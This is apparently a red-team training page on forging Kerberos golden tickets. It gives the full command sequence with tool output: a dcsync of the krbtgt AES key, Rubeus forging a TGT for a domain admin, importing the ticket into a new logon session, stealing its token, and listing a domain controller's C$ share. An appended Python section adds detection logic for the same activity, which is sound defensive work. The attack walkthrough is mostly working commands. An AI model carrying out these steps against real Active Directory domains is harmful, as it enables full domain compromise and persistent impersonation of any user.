Golden Tickets

A "golden ticket" is a forged TGT, signed with the key of the domain's krbtgt account. A silver ticket can also impersonate any user, but it is limited either to a single service or to any service on a single machine. A golden ticket can be used to impersonate any user, to any service, on any machine in the domain; and, to add insult to injury, the underlying credentials are never changed automatically. For that reason, the krbtgt NTLM/AES hash is probably the single most powerful secret you can obtain (and is why you see it used in dcsync examples so frequently).

beacon> dcsync dev.cyberbotic.io DEV\krbtgt

* Primary:Kerberos-Newer-Keys *
    Default Salt : DEV.CYBERBOTIC.IOkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e
      aes128_hmac       (4096) : 6fb62ed56c7de778ca5e4fe6da6d3aca
      des_cbc_md5       (4096) : 629189372a372fda

PS C:\Users\Attacker> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe golden /aes256:51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e /user:nlamb /domain:dev.cyberbotic.io /sid:S-1-5-21-569305411-121244042-2357301523 /nowrap

[*] Action: Build TGT

[*] Building PAC

[*] Domain         : DEV.CYBERBOTIC.IO (DEV)
[*] SID            : S-1-5-21-569305411-121244042-2357301523
[*] UserId         : 500
[*] Groups         : 520,512,513,519,518
[*] ServiceKey     : 51D7F328ADE26E9F785FD7EEE191265EBC87C01A4790A7F38FB52E06563D4E7E
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey         : 51D7F328ADE26E9F785FD7EEE191265EBC87C01A4790A7F38FB52E06563D4E7E
[*] KDCKeyType     : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service        : krbtgt
[*] Target         : dev.cyberbotic.io

[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'nlamb@dev.cyberbotic.io'

[*] AuthTime       : 9/9/2022 11:16:23 AM
[*] StartTime      : 9/9/2022 11:16:23 AM
[*] EndTime        : 9/9/2022 9:16:23 PM
[*] RenewTill      : 9/16/2022 11:16:23 AM

[*] base64(ticket.kirbi):

     doIFLz[...]MuaW8=

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFLz[...snip...]MuaW8=

[*] Using DEV\nlamb:FakePass

[*] Showing process : False
[*] Username        : nlamb
[*] Domain          : DEV
[*] Password        : FakePass
[+] Process         : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID       : 5060
[+] Ticket successfully imported!
[+] LUID            : 0x449047

beacon> steal_token 5060
beacon> run klist

#0>	Client: nlamb @ DEV.CYBERBOTIC.IO
	Server: krbtgt/dev.cyberbotic.io @ DEV.CYBERBOTIC.IO
	KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96

beacon> ls \\dc-2.dev.cyberbotic.io\c$
[*] Listing: \\dc-2.dev.cyberbotic.io\c$\

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     08/15/2022 15:44:08   $Recycle.Bin
          dir     08/10/2022 04:55:17   $WinREAgent
          dir     08/10/2022 05:05:53   Boot
          dir     08/18/2021 23:34:55   Documents and Settings
          dir     08/19/2021 06:24:49   EFI
          dir     08/15/2022 16:09:55   inetpub
          dir     05/08/2021 08:20:24   PerfLogs
          dir     08/24/2022 10:51:51   Program Files
          dir     08/10/2022 04:06:16   Program Files (x86)
          dir     09/05/2022 17:17:48   ProgramData
          dir     08/15/2022 15:23:23   Recovery
          dir     08/16/2022 12:37:38   Shares
          dir     09/05/2022 12:03:43   System Volume Information
          dir     08/15/2022 15:24:39   Users
          dir     09/06/2022 15:21:25   Windows
 427kb    fil     08/10/2022 05:00:07   bootmgr
 1b       fil     05/08/2021 08:14:33   BOOTNXT
 1kb      fil     08/15/2022 16:16:13   dc-2.dev.cyberbotic.io_sub-ca.req
 12kb     fil     09/05/2022 07:25:58   DumpStack.log
 12kb     fil     09/09/2022 09:36:12   DumpStack.log.tmp
 384mb    fil     09/09/2022 09:36:12   pagefile.sys

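A defender-side check for the activity shown above, as an added example that is not part of the original page: it correlates Domain Controller Security events to flag a service-ticket request (4769) that no TGT request (4768) or renewal (4770) preceded within the TGT lifetime, which is the gap a forged TGT leaves since it never passes through AS-REQ, and additionally notes a NewCredentials (type 9) logon on the same host just before it, the pattern left by createnetonly plus ticket import. The sample records, the field names, the 10-hour lifetime and the 10-minute correlation window are assumptions for the example.

```python
from datetime import datetime, timedelta

# Constructed sample records (not from the original page), reduced to the fields
# a SIEM would carry from Domain Controller Security logs: 4768 = TGT requested,
# 4770 = TGT renewed, 4769 = service ticket requested, 4624 = logon (type 9 =
# NewCredentials, the logon type createnetonly reports above).
SAMPLE_EVENTS = [
    {"id": 4768, "time": "2022-09-08 20:00:00", "user": "bfarmer", "ip": "10.0.0.40"},
    {"id": 4768, "time": "2022-09-09 08:01:10", "user": "jking", "ip": "10.0.0.25"},
    {"id": 4769, "time": "2022-09-09 08:02:00", "user": "jking", "ip": "10.0.0.25"},
    {"id": 4769, "time": "2022-09-09 09:00:00", "user": "bfarmer", "ip": "10.0.0.40"},
    {"id": 4624, "time": "2022-09-09 11:16:40", "user": "nlamb", "ip": "10.0.0.231", "logon_type": 9},
    {"id": 4769, "time": "2022-09-09 11:17:05", "user": "nlamb", "ip": "10.0.0.231"},
]

TGT_MAX_LIFETIME = timedelta(hours=10)  # AD default; adjust to the domain's policy


def _ts(value):
    return datetime.strptime(value, "%Y-%m-%d %H:%M:%S")


def find_golden_ticket_indicators(events, tgt_lifetime=TGT_MAX_LIFETIME):
    """Return (reason, event) tuples for TGS-REQs that look like forged TGTs.

    A forged TGT never passes through AS-REQ, so no DC logs a 4768 for it.
    Flag a 4769 when the same user/host has no 4768 or 4770 within the TGT
    lifetime, and additionally when a type-9 logon on that host preceded it.
    Events must be merged from every DC, since AS-REQ and TGS-REQ may hit
    different ones, and log retention must cover at least one TGT lifetime.
    """
    findings = []
    last_tgt = {}      # (user, ip) -> time of latest 4768/4770
    last_type9 = {}    # ip -> time of latest 4624 with logon type 9
    for e in sorted(events, key=lambda r: _ts(r["time"])):
        t, key = _ts(e["time"]), (e["user"].lower(), e["ip"])
        if e["id"] in (4768, 4770):
            last_tgt[key] = t
        elif e["id"] == 4624 and e.get("logon_type") == 9:
            last_type9[e["ip"]] = t
        elif e["id"] == 4769:
            seen = last_tgt.get(key)
            if seen is None or t - seen > tgt_lifetime:
                findings.append(("tgs_without_recent_as_req", e))
                t9 = last_type9.get(e["ip"])
                if t9 is not None and t - t9 <= timedelta(minutes=10):
                    findings.append(("netonly_logon_before_tgs", e))
    return findings


if __name__ == "__main__":
    for reason, ev in find_golden_ticket_indicators(SAMPLE_EVENTS):
        print(f"{reason}: {ev['user']} from {ev['ip']} at {ev['time']}")
```

The stale bfarmer request is flagged because the only TGT seen for that user/host is older than the lifetime; a legitimate renewal would have produced a 4770 and cleared it.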